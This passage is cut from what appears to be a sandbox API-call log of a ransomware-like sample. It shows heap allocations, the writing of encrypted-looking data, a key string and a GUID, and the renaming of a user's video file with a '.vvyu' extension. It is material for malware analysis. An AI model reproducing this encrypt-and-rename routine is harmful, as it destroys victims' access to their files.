dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d2c8 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.444] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x175d3, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x175d3, lpOverlapped=0x0) returned 1 [0197.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.446] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x175d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.446] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.447] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.447] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.447] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.447] CloseHandle (hObject=0x52c) returned 1 [0197.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d31688 [0197.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.450] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\b3JSk19CS30.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\b3jsk19cs30.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\b3JSk19CS30.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\b3jsk19cs30.avi.vvyu")) returned 1 [0197.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.453] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.456] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df31990, ftCreationTime.dwHighDateTime=0x1d8a5bf, ftLastAccessTime.dwLowDateTime=0x5a9366f0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x5a9366f0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x175d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b3JSk19CS30.avi", cAlternateFileName="B3JSK1~1.AVI")) returned 0 [0197.456] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0197.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0197.458] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0197.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0197.458] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0197.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.486] HeapFree (in: 